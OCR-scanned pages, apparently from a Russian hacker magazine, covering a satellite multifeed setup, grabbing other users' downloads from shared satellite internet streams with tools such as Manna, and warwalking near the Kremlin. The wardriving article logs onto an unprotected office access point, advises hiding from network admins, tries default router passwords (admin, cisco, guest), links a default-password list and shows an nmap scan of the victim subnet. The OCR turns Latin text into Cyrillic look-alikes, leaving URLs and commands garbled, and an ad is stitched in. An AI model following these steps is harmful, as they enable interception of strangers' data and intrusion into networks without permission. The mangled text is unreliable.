отвечать за взаимодействие между конвер- 
терами. Стоит такой девайс от 50 рублей до 
50 баксов, в зависимости от производителя и 
количества входов для конвертеров, которые 
к нему возможно подключить. Я тебе советую 
взять проверенный Ооісіеп Іпіегзіаг немецко- 
го производства за 15 баксов. Итого наша 
статья расходов составит $25. Добавим сюда 
второй конвертор баксов за 10 и в конечном 
счете получим чуть более $35. На мой взгляд, 
копейки, особенно в сравнении с ценами на 
другое компьютерное железо. 

□ Сухие числа 

Попробуем установить дополнительный кон- 
вертер. Чтобы не искать иголку в стоге сена, 
необходимо провести предварительные 
расчеты смещения дополнительного кон- 
вертера. Это можно сделать по формуле: А 
= Р*зіп(ІаІ). Здесь А — это смещение, Р — фо- 
кусное расстояние в случае прямофокусной 
антенны (такие антенны мы трогать не будем) 
и расстояние от конвертера до центра реф- 
лектора в случае офсетной антенны, ІаІ — мо- 
дуль разности азимутов или углов возвыше- 
ния. Этом, что обозначают эти параметры, мы 
уже писали (не волнуйся, статья о настройке 
спутникового ТВ будет на диске). А выяснить 
их можно с помощью программы ЗАТТѴ ( ѵѵѵѵѵѵ. 
бііеИеІесот.ги/сІоѵѵпЛ . ЗМѴѴБіпк ( ѵѵѵѵѵѵ.зтѵѵ. 
зе/ЗМУѴІЭпк.ІТпп ) или онлайн-калькулятором 
( ѵѵѵѵѵѵ. Іар.пеі/Апіеппа АІіаптепІ/ІпсІех.рІірТ 
Таким образом, мы получаем смещение (об- 



и другой будут орать тебе уровень сигнала, 
пока ты будешь крутить антенну на крыше 
(или где там она у тебя стоит?). 

□ Лезем на крышу 

Если тарелка монтирована к стене около окна 
или балкона, то на крышу лезть, естественно, 
не нужно. Но все-таки на крыше заниматься 
подобными делами намного безопаснее и 
удобнее, даже несмотря на то, что инстру- 
мент и все вспомогательные средства при- 
дется поднимать с собой. Уровень сигнала 
я отслеживал с помощью ресивера и телека 
(смотри скрины), поэтому мне потребовалось 
питание, и я прицельным выстрелом скидывал 
удлинитель себе в окно. Для начала я сделал 
тестовый двухметровый кабель с двумя Р-кон- 
некторами по одному на каждую сторону ка- 
беля и прицепил его к текущему конвертору и 

> Онлайн-калькулятор даст данные по 
настройке на спутник. Здесь: Зігіиз2 
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На самом деле можно 
обойтись радиотеле- 



фоном и оставленной 
рядом с колонками 
«базой». 






ресивѳрудлятого, чтобы оценить уровеньсиг- 
нала. В случае, когда настройка осуществля- 
ется с помощью компьютера, необходимости 
в таком кабеле нет — тебе достаточно посмот- 
реть показания программы РазіЗаіРіпсІег без 
каких-либо манипуляций с кабелями. 

Так или иначе, убедившись, что сигнал до- 
стиг максимального уровня, затягиваем все 
болтовые соединения потуже и присоединя- 
ем крепление мультифида в соответствии с 
прилагаемой к нему инструкцией. РІесмотря 
на то, что универсального рецепта, ввиду 
большого количества вариантов, я дать не 
могу, проблем возникнуть не должно. Новый 
конвертер будет правее и выше штатного об- 
лучателя из-за того, что Зігіиз на геостацио- 
нарной орбите расположен на 5 градусов на 

> Теперь понимаешь, почему мультифид 
в принципе возможен? 



восток, а хотберд — на 13. После установки 
все будет выглядеть, как на фотографии. Для 
второго конвертера выставляем примерные 
смещения, высчитанные по формулам, и 
уровень поворота, определенного програм- 
мами, после чего начинаем эксперименты. 
Медленно передвигай второй конвертер по 
разным осям, не забывая отслеживать уро- 
вень сигнала. Чтобы не пропустить спутник, 
я подключил к дополнительному конвертеру 
тестовый кабель, идущий до ресивера, а на 
самом ресивере выбрал спутник Зігіиз 2,3. 
Если у тебя в ресивере нет предустановок 
для данного спутника, то их придется забить 
вручную. Необходимые параметры (частота, 
символьная скорость и поляризация одного 
из транспондеров), как всегда, можно ска- 
чать с сайта ѵѵѵѵѵѵ.іупдзаі.сот . Они же приго- 
дятся, если настройкаосуществляется через 
РазІЗаіРіпсІег, хотя в программе изначально 
забиты актуальные данные о каждом из спут- 
ников. Через 10-15 минут мучений и кропот- 
ливой настройки ты все-таки найдешь хоть 
какой-то сигнал. Далее — дело техники: как 
только добьешься максимального сигнала, 
закручивай шестеренки. Главное, чтобы 
уровень сигнала был не ниже 40%, иначе в 
плохую дождливую погоду о приеме придет- 
ся забыть. 

Теперь делаем 2 кабеля по полметра, на кото- 
рые с обеих сторон наворачиваем Р-разъемы. 
С одной стороны крепим кабели к конверте- 
рам , с другой — к А и В входам дисека. Т от же 
кабель, что раньше шел к тарелке, подключа- 
ем к выходу переключения. Все. Мультифид 
настроен! 

□ Комп — всему голова 

Все, сигнал есть! Пора задать конфигурацию 
в РгодОѴВ. Если ты еще не установил эту су- 
перскую программу, то рекомендую сделать 
это прямо сейчас. Дистрибутив ты найдешь 



на официальном сайте: 
ѵѵѵѵѵѵ.ргоасІѵЬ.сот . оттуда 
же для закачки доступны 
несколько полезных пла- 
гинов. Все, что от нас тре- 
буется после установки, 

— это настроить ОіЗЕдС. Для этого переходи 
в меню «Настройки» (хотя проще нажать ком- 
бинацию клавиш «АІ1: + О») и в появившемся 
диалоговом окне выбери «1 ,0ог2.0».Обакон- 
вертера прописываются с помощью кнопки 
«Добавить конвертер». В появившемся пос- 
ле ее нажатия окне выбери тип конвертера 

— « Ки-ЬапсІ» (оба конвертора работают в Ки- 
диапазоне) и укажи нужный спутник в «Пози- 
ции». Оставив дефолтные значения в полях 
І_ОР1, 3\лЖсН и І_ОР2, жми «Ок» и повторяй 
операцию для второго конвертера. Теперь 
остается только установить принцип опре- 
деления сигнала в ОіЗЕдС'е: поставь галочку 
около опции «Ву ЕВЫ» и смело закрывай окно. 
Настройка конвертеров закончена, так что 
переходим к сканированию каналов. Для это- 
го залезай в меню «Список каналов -> Поиск 
каналов -> ОіЗЕцС 1 .0 ог 2.0» и выбирай один 
из спутников. Если ты все сделал правильно, 
то результат не заставит тебя ждать: РгодОѴВ 
найдет телевизионные, радио- и цифровые 
каналы на каждом из спутников. А к этому мы 
и стремились. 

О Искусство фишинга 

Поскольку обычная спутниковая антеннауме- 
ет только принимать данные и никак не пере- 
давать их, большинство спутниковых провай- 
деров используют асинхронные принципы 
работы. Для использования сатинета пользо- 
вателю требуется так называемый обратный 
канал, по которому он передает запросы в 
датацентр (например, такие: «отправьте мне 
страницу ѵѵѵѵѵѵ.хакер.ги »). Датацентр обра- 
батывает этот запрос и через транспондер 
спутника инжектирует нужную информацию 
в передаваемый поток. Как понимаешь, этот 
поток для всех одинаковый. Его нельзя раз- 
делить на отдельные составляющие и пере- 
давать их по конкретным координатам. Пе- 
редается все, всем и сразу. Другое дело, что 
оборудование каждого абонента выбирает из 
потока данные, предназначенные конкретно 
ему. Но ведь никто не мешает обрабатывать 
все данные сразу! 

Получается, что файлы, запрошенные одним 
пользователем, вполне успешно могут быть 
приняты и всеми остальными клиентами, на- 
строенными натотже транспондер и слушаю- 
щими нужный цифровой поток (РЮ). Правда, 
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не стоит забывать, что пользователь обычно закачивает 
файл в несколько потоков, а иногда даже с нескольких 
зеркал. И что еще хуже — в любой момент может приос- 
тановить закачку, чтобы когда-нибудь позже возобновить 
ее. Все это сильно усложняет и без того непростую задачу 
программ-грабберов, которые благодаря продуманным 
алгоритмам эффективно извлекают из спутникового по- 
тока ценные файлы, зачастую большого размера (филь- 
мы, 130 с дистрибутивами ОС, музыку, большие архивы и 
т.д.). Одной из наиболее продвинутых разработок в этой 
области по праву считается программа ЗкуЫеі. В послед- 
нее время ее развитием занимается несколько человек, 
однако дела у ребят идут довольно вяло. Куда больших 
успехов добились ее многочисленные модификации. На 
сегодняшний день активно поддерживаются мод от К. ТОО 
( ННр://ѵіассе55Ігее.огаЛогит/5НоѵѵФгеаб.рІпр?1=23666) 
и ЭаІаЗку ( Ііир://ѵіассеззІгее.огаЛогипп/зІіо\А/ШгеасІ. 
рНр?1=22558Т Кроме этого, семимильными шагами 
развивается независимый проект Маппаргоіесі ( ѵѵѵѵѵѵ. 
таппа-рго]ес1.пеб . Появившийся относительно недавно, 
он завоевал нехилую популярность. И на нем я, пожалуй, 
остановлюсь подробнее. 

О Манна небесная 

Маппарго]есІ — разработка со всех сторон привлека- 



тельная. Суди сам: работает с любыми ОѴВ-картами, 
простая в настройке и использовании, да еще и грабит 
поток на ура! Экспериментальная версия приложения 
(другую не найдешь) доступна на официальном сайте — 
ѵѵѵѵѵѵ.таппа-ргоіесі.пеі . Программа распространяется в 
виде архива, который следует распаковать в отдельную 
папку на КІТРЗ-разделе (это очень важно). Сразу огово- 
рюсь: Маппа работает исключительно под ѴѴіпбоѵѵз ХР 
и требует никак не меньше 512 Мб оперативной памяти. 
Выполнение всех требований — это, пожалуй, самый 
сложный этап в настройке Маппа. Дальше все пойдет 
как по маслу. 

Для начала покажем Маппа, с какой ЭѴВ-картой ей пред- 
стоит работать. За это отвечает параметр Эеѵісе 0 в спе- 
циальном файле-конфигурации таппа.іпі. Поскольку я 
использую 8ку8іаг2, необходимо раскомментировать 
строку: 

Реѵі сеОзк у.сІІІ 

Значения этого параметра для других карт ты найдешь 
в комментариях к самому файлу. Теперь организуем 
рыбалку с нужного нам интернет-провайдера: для это- 

> Интерфейс говорящей программы Раз! ЗаіРіпсІег. 




> Почему мультифид не 
часто делают на пря- 
мофокусных антеннах? 
Дело в том, что допол- 
нительные конвертеры 
в таком случае создают 
тень-антенну и тем 
самым ухудшают прием, 
в том числе и на первый 
конвертер. А кому это 
нужно? 




> На ОѴО-приложении к 
журналу собрана боль- 
шая подборка необходи- 
мого софта, всевозмож- 
ной информации и всего 
остального, что может 
потребоваться тебе для 
комфортной рыбалки. 



МРѲ 

> Программа Зкупеі 
также имеет мощную 
систему фильтрации, 
основанную на правилах 
гезехр. Помочь в их 
составлении готова 
специальная утилита 
ЕазуНиІезСгеаіог ( ѵѵѵѵѵѵ. 
аз.гиМо/зі/агаЬ.ГіІт П. 




> Имей в виду, что вели- 
чина улова сильно за- 
висит от стабильности 
и производительности 
твоего компьюте- 
ра, а также уровня 
сигнала со спутника. 

С доисторическим 
компьютером, да еще и 
60 -сантиметровой та- 
релкой идти рыбачить 
вряд ли будет хорошей 
идеей. 
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го в текстовом редакторе отроем конфиг 
ргоѵісіегз.іпі. В файле уже включены описа- 
ния некоторых провов, и, чтобы активировать 
один из них, достаточно раскомментировать 
(убрать в начале строки символы //) опцию 
сІеТаиІІ. Если нужного описания в конфиге 
ты не найдешь — не огорчайся. Добавим его 
сами. Например, так: 

ргоѵісіег ЗаіѲаіе Зігіиз 5е 
сНз едЦЙюпе 

іипег 1 1 91 9 Н 27283 аиіо ки роѵѵег 
рісі апу 
гиіез <попе> 

Щаи ІІ 

Самое сложное здесь — параметр іипег. Его 
значение я взял с сайта ѵѵѵѵѵѵ.Іупазіаі.сот . С 
помощью поля сіізедс конфигурирует работу 
программы с переключателем. Дефолтное 
значение попе подразумевает, что дисек ис- 
пользоваться не будет, но в нашем случае это 
неправильно. Значение параметра необходи- 
мо заменить следующим образом: 

Іеѵе1 1 .0 АА// 1-й вход 

ІеѵеІ 1 .0 ВА // 2-й вход — Выбираем это, так как Зігіиз 
конвертер мы поставили на второй вход! 

Іеѵе1 1 .0 АВ//3-Й вход 
Іеѵе1 1 .0 ВВ//4-Й вход 



— древние драйвера, которые я доселе без 
проблем использовал на протяжении долго- 
го времени. Однако программе они чем-то не 
понравились, и она заработала лишь после 
установки обновленного варианта. Да, пому- 
чился, но зато как я обрадовался, когда прога 
все-таки заработала. Я не буду расписы- 
вать всю прелесть и удобство интерфейса: 
ты и без моих комментариев все увидишь 
на скриншоте. Все перехваченные потоки 
здесь как на ладони. Заметил что-нибудь 
важное? В таком случае не поленись увели- 
чить стандартное значение таймаута, чтобы 
неупустить ценный файл, если пользователь 
решит поставить закачку на паузу. Благо все 
это делается одним кликом мыши. 

Понятно, что перехватывать все файлы под- 
ряд — настоящее безумие. Поэтому важным 
аспектом работы Маппа является продуман- 
ная система фильтрации. Фильтры действу- 
ют в соответствие с правилами (рулесами), 
описанными в отдельном конфигурацион- 
ном файле, который задается для каждого 
конкретного транспондера параметром гиіез 
(смотри выше ргоѵісіегз.іпі). В поставке с про- 
граммой есть примерный конфиг (Шегз.іпі) с 
подробными комментариями, которые помо- 
гут тебе разобраться со всеми нюансами со- 
ставления фильтров. Впрочем, на специали- 
зированных форумах типа ИДр://ѵіассеззІгее. 
огаЛошт/ и ѵѵѵѵѵѵ.іогит.аіѵпо.ги пользователи 




Далее сам запуск. Помнится, когда я только 
начинал экспериментировать с Маппа, запус- 
тить ее с первого раза не удалось. Виной тому 



••• 

•• 



••• 



Самый простой пере- 
ключатель ОіБЕяС 



нередко делятся своими наработками. Тебе 
достаточно проштудировать архив. 

Г раббингфайлов производится с указанных в 
ргоѵісіегз.іпі РЮ’ов (потоков с данными). Если 
в качестве значения опции рісі установлено 
значение апу, то Маппа начнет обрабатывать 
все пиды сразу. Все это, скорее всего, при- 
ведет к тому, что производительности ком- 
пьютера не хватит для корректной работы, и 
файлы один за другим начнут биться, аты поп- 
росту останешься с носом. По этой причине 
рекомендую указать активные РЮ’ы вручную. 
Благо выяснить их несложно. Во-первых, они 
частенько обсуждаются на уже упомянутых 
форумах. А во-вторых, никто не мешает тебе 
вычислить их самому с помощью так называе- 
мого РісІЗсаппег’а ( ѵѵѵѵѵѵ.ргоасІѵЬ.сот/рІиаіпз. 
Ьіт) — плагина, который без проблем под- 
ключается к уже установленной РгодОѴВ. ІН= 



СОРТИРОВКА ТАЙЛОВ 

Если всерьез решил заняться рыбалкой, 
то будь готов к ежедневной работе по раз- 
бору всего того барахла, которое перехва- 
тит файл-граббер. И хотя жесткие правила 
фильтрации, а также полезные функции той 
же Маппа позволяют отсеять большую часть 
мусора, справиться с каждодневной помой- 
кой тебе будет нелегко. Сэкономить массу 
времени, нервов и сил позволят программы 
для автоматической сортировки — я не мог 
о них не упомянуть. Во-первых, это Зтагі 
Зоііег ( ѵіассеззігее.ога/іогит/зііоѵѵііігеасі. 
рбр?р=232473 ). предназначенная для сорти- 
ровки награбленных архивов ВАР по опреде- 
ленным директориям с переименованием и 
подбором паролей (для многотомных и обыч- 
ных архивов). Программа работает в тексто- 
вом режиме, так что ее легко можно исполь- 
зовать вкупе с планировщиком. 

Другая полезная тулза — это СгузіаІ 
Зогіег ( ѵіассеззігее.огаЛогит/зІіоѵѵІІігеасІ. 
рЬд?1н24128). Система плагинов позволяет 
до бесконечности наращивать ее функци- 
ональность, но даже в стандартной сборке 
она автоматически переименовывает МРЗ- 
файлы, используя инфу из Юѵі - и Юѵ2- тэгов, 
раскидываетфайлы по каталогам, названным 
текущей датой, удаляет музыку по заданным 
критериям (моно, низкий битрейт, исполни- 
тель — в черном списке). Кроме этого, Сгузііаі 
Зогіег удаляет все дубликаты и постоянно об- 
новляет свою хэш-базу. Нужна она для того, 
чтобы тебе повторно не попадались файлы, с 
которыми ты имел дело давно. 
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100 хитов в подарок! 



Представь... 

твой идеальный спутник 

• Металлический корпус 

• 35 часов работы без подзарядки 

• РМ-тюнер 

• Диктофон 

• Объем памяти 1/2/4 Гб 

• Цветной ТРТ-дисплей 

• Цвета корпуса: черный, серебристый, розовый 



трЗ'СІііЬ 

трЗ.затзипд.ги 






Единая служба поддержки: 8-800-200-0-400. 



Галерея 8ат$ипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. шлл/.затзипд.ш; трЗ.затзипд.ги. Товар сертифицирован. Реклама. 






ЗНАКОМСТВО С БЕСПРОВОДНЫМИ СЕТЯМИ ОБЫЧНО ПОХОЖЕ НА ДЕТСКИЕ ШАЛОСТИ. СНАЧАЛА ДОСТУП В СЕТЬ ИЗ ЛЮ- 
БОЙ ТОЧКИ ДОМА И ОФИСА ВСЯЧЕСКИ ЗАБАВЛЯЕТ И РАДУЕТ, НО СО ВРЕМЕНЕМ ИНТЕРЕС НАЧИНАЕТ УГАСАТЬ. 

ТЫ ПРИВЫКАЕШЬ. НО ВОТ ЕСЛИ КОПНУТЬ ГЛУБЖЕ И НЕМНОГО ПОЭКСПЕРИМЕНТИРОВАТЬ... ВООРУЖИТЬСЯ НОУТОМ, 
ПРИКРУТИТЬ К НЕМУ ОРЗ-МОДУЛЬ И САМОСТОЯТЕЛЬНО СОСТАВИТЬ КАРТУ БЕСПРОВОДНЫХ СЕТЕЙ, КАК ТЕБЕ ИДЕЯ? ИЛИ 
ВООБЩЕ — ПОПРОБОВАТЬ ВЗЛОМАТЬ КАКОЙ-НИБУДЬ ОФИС. НЕ ИЗ ДОМА, А ПРЯМО С УЛИЦЫ. ДЕЛАТЬ ЭТО У ВСЕХ НА 
ГЛАЗАХ, И ПРИ ЭТОМ НИКТО ДАЖЕ НЕ ЗАПОДОЗРИТ НЕЛАДНОЕ. ВОТ ЭТО НАСТОЯЩИЙ АДРЕНАЛИН, КАЙФ — НЕ ТО ЧТО 
КАКОЙ-ТО ТАМ ВЕБ-ХАКИНГ. 



абегая вперед, скажу, что занесло 
меня как-то в Кремль. Естественно, 
не случайно — мне жутко хотелось 
посмотреть, что же хранят в себе точки досту- 
па рядом с кремлевскими елочками. Подоб- 
ные фокусы порой возможно выполнить один 
раз, поэтому очень важно было зафиксиро- 
вать месторасположение АР’шек (Ассезз 
Роіпі, точка доступа). Составить полноценную 
карту можно с помощью глобальной системы 
позиционирования, но для этого понадобится 
ОРЗ-приемник. Например, ОІоЬаІЗаі ВЕІ-303 
ІІЗВ на чипсете ЗіРР ЗіагІІе/ЬР ($85), который 
я использую и полностью им доволен. Девайс 
обеспечивает высокую скорость и достаточ- 
ную точность определения координат, при 
этом обладает почти минимальным «холод- 
ным стартом», равным всего 45 секундам. 
Это очень хороший показатель, поскольку 
при первом включении ОРЗ-приемник не мо- 
жет сразу определить месторасположение и 
выполняет ряд действий (посылка сигналов 



на спутники системы, прием и обработка ин- 
формации и т.д.), чтобы сориентироваться на 
местности. 

Ноутбук АІіепѵѵаге ЫР9860, который всегда 
при мне, за счет своей компактности также 
является идеальным инструментом для вар- 
драйвинга. Если ты используешь винду, что 
наиболее вероятно, не будет лишним при- 
гласить приятеля с ноутбуком на базе дру- 
гой системы. В ходе боевых действий нам 
понадобятся такие никсовые тулзы, для ко- 
торых портов и аналогов для винды пока не 
существует. Важно заранее позаботься о 
совместимости ѴѴі-Рі карты с операционкой, 
как это сделал мой друг И дЗг, использующий 
в качестве беспроводного адаптера ІпіегзіІ 
РЫЗМ2, совместимый с Ыпих и всеми необ- 
ходимыми программами. 

О Где же ты, моя звезда? 

Безопасность сетей на базе стандартов 
802.11 оставляет желать лучшего, вместе с 



тем популярность \А/1_АЫ все растет и растет. 
В центре Москвы беспроводные услуги пре- 
доставляются почти на каждом углу. Только 
по официальной информации в столице на- 
ходится свыше двухсот точек доступа, и это 
не предел. Однако сканирование города мы 
оставим вардрайверам — экспериментато- 
рам на колесах. А сами мы устроим рейд до 
кремлевских стен пешком, то есть займемся 
так называемым ѴѴагѵѵаІкіпд — искусством 
поиска беспроводных сетей на своих двоих. 
В качестве объекта для изучения мы выбра- 
ли Охотный ряд, самый центр Москвы. Наша 
цель — это, конечно, закрытые сети, однако 
сканировать будем и публичные точки досту- 
па. По отмеченным на карте хотспотам легко 
можно визуально анализировать месторас- 
положение и дистанцию между ними. 

Как уже было сказано, информация об обна- 
руженных точках доступа будет нанесена на 
электронную карту, которую в дальнейшем 
можно легко отконвертировать в один из 
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МЛЬ. ИЛИ ВОЗДУШНЫЙ БЕСПРЕДЕЛ 



графических форматов. Правда, для это- 
го понадобится несколько программных 
инструментов. 

Вопрос о выборе сканера беспроводных се- 
тей не стоял. В наших целях наиболее удоб- 
но будет использовать ЫеізіитЫег ( ѵѵѵѵѵѵ. 
пеізіитЫег.сот У который не только эффек- 
тивно анализирует эфир, но еще и совместим 
с ОРЗ-приемниками. Поэтому в информации 
о каждой обнаруженной точке доступа будет 
содержаться информация о ее долготе и ши- 
роте. Собственно отсканера нам нужны логи, 
которые ЫеізіитЫег сохраняет в особом 
формате .N31. Отобразить точки на карте 
(а это следующий этап) можно различными 
средствами. Сначала рассмотрим случай с 
использованием софта для ОРЗ-навигации: 

• Місгозоіі Марроіпі Еигоре ( ѵѵѵѵѵѵ. тісгозоіі. 
сот/тарроіпі/2004/еигоре.тзрх ). Это кар- 
тографический продукт, который отлично 
интегрируется с ОРЗ-устройствами (в любой 
момент отображает твое территориальное 
положение), включает в себя карту Москвы и 
при этом совместим со сканером №ізіитЫег. 
Вообще, подобная совместимость играет 
важную роль и является огромным плюсом. 
Отчет о сканировании беспроводной сети 
можно импортировать не в каждую програм- 
му. В некоторых случаях спасут специаль- 
ные скрипты, позволяющие преобразовать 
насканенные логи. Как, например, с про- 
граммой МарЗоигсе МРЗ, для которой тебе 



потребуется заюзать вспо- 
могательный конвертер N31 
іо МарЗоигсе сопѵегіег ( Ьіір:// 
іегепіп.сот/пеі52тр5.2Ір 1. 

Но подобных инструментов 
может и не быть! Возвраща- 
ясь к Марроіпі, хочу отметить 
идущую в комплекте утилиту 
Місгозоіі І_осаііоп Ріпсіег, позво- 
ляющую отследить свое место- 
расположение даже без использования ОРЗ. 
Прога показывает положение пользователя 
на карте, ориентируясь по находящимся ря- 
дом с ним точкам доступа ѴѴі-Рі: найденные в 
эфире МАС-адреса базовых станций сверя- 
ются с базой данных, и в итоге пользователь 
узнаето своем местонахождении сточностью 
примерно 15-50 м. В качестве карты исполь- 
зуется онлайн-сервис Місгозоіі — МЗИ ѴігіиаІ 
ЕагіЬ ( іііірУ/ІосаІ.Ііѵе.сотЛ . являющийся пол- 
ным аналогом Ооодіе ЕагіЬ. 

• Місгозоіі Зігееіз Тгірз ( ѵѵѵѵѵѵ. тісгозоіі. сот/ 
зігееізЛ является идеальным ПО для автолю- 
бителей (в том числе и вардрайверов), так как 
заточена для визуально удобного ориентиро- 
вания на местности. Более того, существует 
поддержка голосового сопровождения. Для 
импортирования отчета сканера необходимо 
использоватьЗігееіЗіитЫег2004ВС4.6( іШр:// 
(юте.абе1рНіа.пеі/~кд4іх5/552004 ). програм- 
ма преобразует полученный N3 — файл — и 
информация о найденных сканером точках 




> Сканер беспроводных сетей сегодня в ударе 



> Эта программа нужна, чтобы наносить информацию 
о точках доступа на растровые карты 



будет визуально отображена на карте. 

• Автогис ( ѵѵѵѵѵѵ.кіЬегзо.сот ) — это еще один 
подходящий продукт. О прелестях россий- 
ской разработки ты должен был прочесть 
в прошлых номерах ][ («Хакер», номер 
#078). Комплект абсолютно совместим с 
ИеізіитЫег, но для его использования по- 
надобится утилита ЗіитЬѵегіег ( ѵѵѵѵѵѵ.зопаг- 
зесигііѵ.сот ). которая поможет нанести най- 
денные АР на растровые изображения карт 
(тулза также совместима с Марроіпі, Місгозоіі 
Зігееіз Тгірз и, собственно, Автогис). Все, 
что от тебя требуется, — запустить Автогис 
вместе с ЗіитЬѵегіег. А дальше ты без труда 
сможешь найти на карте нужную улицу, дом, 
любой объект городской инфраструктуры и, 
конечно же, свои точки доступа. 

Для полного понимания приведу общую 
схему: сканер ИеізіитЫег детектит АР — > 
данные об АР и ее месторасположении (с 
помощью ОРЗ-приемника) отображаются 
на интерфейсе ИеізіитЫег и сохраняются в 
специальный лог .пзі — > ЗіитЬѵегіег нано- 
сит информацию о точках на карты картогра- 
фических систем. 
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О Бесплатные методы 

Следует отметить, что все вышеперечислен- 
ные продукты являются коммерческими, но 
существуют абсолютно бесплатные реали- 
зации нашей идеи. В этом нам помогут спе- 
циальные скрипты, позволяющие конверти- 
ровать N347^™ в массу других форматов. 
Один из конвертеров (работает в онлайн) 

> Вот так неприметно выглядит (ЗРЗ- 
приемник ѲІоЬаІЗаі ВІІ-303 ЫЗВ 
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— РНРЗіитЫегРагсІегѵІ .1 ( ІпДр://кЬЗірсІ.сот/ 
рIпр31^тЫе^Ра^5е^/іпсIеx■рІ1р , )■ Полученная на 
выходе информация будет содержать ши- 
роту, долготу, МАС-адрес удаленной точки, 
ЗЗЮ, информацию о канале и наличие ѴѴЕР/ 
ѴѴАР защиты. Внимание, важный момент. 
Среди выходных форматов есть так называ- 
емый ,КМІ_ — формат, который используется 
известнейшим сервисом Ооодіе ЕаіІІі. А это 
значит, что ты без труда сможешь импор- 
тировать информацию о точках и отобра- 
зить ее на качественных фотографиях со 
спутника — вот это я понимаю, привязка к 
местности! 

Загорелся? Тогда качай программную вер- 
сию онлайн-сервиса, а именно Ооодіе Еагіб 
Эезкіор ( НДр://еаг1Н.доод1е.сотЛ . Далее че- 
рез меню «Рііе — > Ореп» выбирай КМІ_-файл 
и импортируй его. Вот как, оказывается, все 
просто! Для более наглядного восприятия я 
рекомендую КЫЗОЕМ ( ѵѵѵѵѵѵ.гірі.сот/кпзает. 
Ыт). Программа поможет «раскрасить» при- 
вычную карту в настоящую карту ѵѵагѵѵаікег'а, 
подсветить найденные точки различными 
цветами в зависимости от защищенности, 
закрасить зоны радиопокрытия или провести 
дистанционные линии. 

Парсить логи беспроводного сканера и со- 
здавать карту — это, конечно, хорошо. Но, 
возможно, тебе захочется использовать 
Ооодіе ЕаіИп для отображения своих коор- 
динат в реальном времени? То есть в любой 
момент отслеживать свои перемещения, 
скорость движения — и все это в привязке 
с фотографиями! Подобную возможность 
предоставляет программа ОРЗ ТгаскМакег 
13.0, работающая в связке с Ооодіе ЕаіТН 
ЭезкЩр. После запуска нужно выбрать про- 



на экране 
атся инсрор- 



ступа 



токол ІЧМЕА, после чего прога определит 
используемое тобой ОРЗ-устройство и за- 
пустит окно навигации в реальном времени. 
В красивой панели приборов есть маленькая 
кнопочка с логотипом Ооодіе ЕагіН. Думаю, 
не надо объяснять, что делать далее? :) 

Во всей этой схеме есть одна загвоздка: для 
подкачки карт требуется доступ в сеть. А что 
делать, если под рукой есть только ОРЗ-мо- 
дуль? Ведь по ОРРЗ карты особенно не пока- 
чаешь? Так вот, если тратить кровные деньги 
(аеще время и нервы) на мобильный интернет 
не хочется, то советую провести некоторые 
оффлайновые работы: предварительную 

загрузку карт с интернета, для которой нуж- 
но лишь посерфить планируемые местнос- 
ти для ѵѵагѵѵаікіпд'а. Полученные текстуры 
программа автоматически занесет в кэш, и 
в дальнейшем с полным отсутствие инета 
ты сможешь запустить Ооодіе ЕаіІН и нагло 
игнорировать все запросы о подключении к 
сети. Скэшированные дома данные (они на- 
ходятся в СЛЭоситепіз апсі ЗеіііпдзХРСпатеХ 
АррІісаііопОаіа\ОоодІе\ОоодІеЕагіИ) тут же 
выведутся на экран. 



О Выдвигаемся 
в бой 

Передтем какпрятать девай- 
сы в рюкзак, удостоверься, 
что выставлены корректные 
настройки электропитания. Представляю, что 
скажет тебе приятель, прошедший с тобой 
пол-Москвы, чтобы удостовериться в том, что 
твой ноут уже «спит». Во избежание подобной 
накладки кликни на значок батарейки в трее, 
зайди в «Настройки электропитания» и смени 
опции спящего режима. В частности, нужно 
деактивировать автоматическое отключение 
дисков и дисплея. Кроме этого, позаботься о 
том, чтобы имя твоего компьютера не вызыва- 
ло подозрения у админов, мониторящих сеть. 
Что-нибудь неброское вроде \д/огкзіаііоп21 
будет менее заметно, чем гордое ѴѴіРі-Наскег. 
Вернемся к нашей истории. Недолго думая, 
я прошелся вглубь Манежа с огромным ко- 
личеством торговых точек и офисов внутри. 
Звуковое оповещение от ІЧеізІитЫег не за- 
ставило себя долго ждать, поэтому я потя- 
нулся за ноутом, чтобы проверить результа- 
ты. На дисплее отобразились МАС-адреса 
многочисленных сетей, их идентификаторы, 
частоты и инфа об использовании криптоза- 
щиты ѴѴЕР/ѴѴРА. Мне крупно повезло, так как 
в списке найденных сетей была точка, кото- 
рая не фильтровала подключения по МАС- 
адресам и не имела даже ѴѴЕР-защиты (ѴѴігесІ 
Ециіѵаіепі Ргіѵасу). Я тут же законнектился и 
увидел, что роутером оказался Зепао с кана- 
лом в 1 1 Мбит/с. Скорость небольшая, но чем 
меньше канал, тем он более устойчив к радио- 
помехам. Это особенно актуально в центре го- 
рода, поэтому нетничего удивительного втом, 
что многие админы умышленно ограничивают 
скорость. Передав приветы в аське, я обратил 
внимание на карту: ОРЗ четко показывало мое 
местоположение, а ЗІитЬѵегіег отмечал бли- 
жайшие хотспоты с указанием их дистанции 
друг от друга в Марроіпі'е. 

Как действовать, подключившись к точке 



> Выбросим клиента из сети с помощью тулзы ѴоісІ1 1 
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АТАКА НА КРЕМЛЬ, ИЛИ ВОЗДУШНЫЙ БЕСПРЕДЕЛ 
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> Программа для смены МАС-адреса 



доступа, — это отдельный вопрос. Можно сделать мно- 
гое! При подключении к сети, твой ІР автоматически из- 
менится на выданный сетью. Обязательно запомни его 
и попробуй зайти через браузер на первый узел той же 
подсети (х.х.х. 1 ). Вполне вероятно, что на этом адресе бу- 
дет ѴѴЕВ-интерфейс для управления АР’шкой, в котором 
несмышленые админы зачастую оставляют пароли по 
умолчанию (абтіп, сізсо, диезі). Заполучив к ней доступ, 
ты сможешь рулить таблицей роутинга, списками дове- 
ренных МАС’ов и всем, о чем только мечтал. Специально 
для тебя бонус: списокЗЗЮ и паролей, устанавливаемых 
производителями поумолчанию, который можно скачать 
здесь: ІіДр://сир.зи/ѵѵі-іі/ззіб беіаиііз-і .0.5.гаг . 

После входа в сеть разумно проанализировать все сете- 
вое окружение на наличие уязвимостей. Например, с по- 
мощью сетевого сканера ІЧтар ( ѵѵѵѵѵѵ.іпзесиге.огд/птарЛ . 
сканируя диапазон ІР-адресов с открытым 1 39-м портом: 



птар -зТ -р 1 39 х.х.х. 0/24 



Еще одной полезной в исследовательских целях тулзой 
является ТНС-ВІІТ, которую в народе именуют «ножом 
вардрайвера во вражеской сети». На борту программы 
— целая куча методов анализа локалки, в том числе агр 
Іоокир, зрооіеб ЭНСР гециезі, РАРР, ВООТР, ІСМР-ріпд, 
ІСМР аббгезз тазк гециезі, ОЗ Тіпдегргіпіііпд и скоро- 
стное опознавание хостов. Используя уязвимые сервисы 
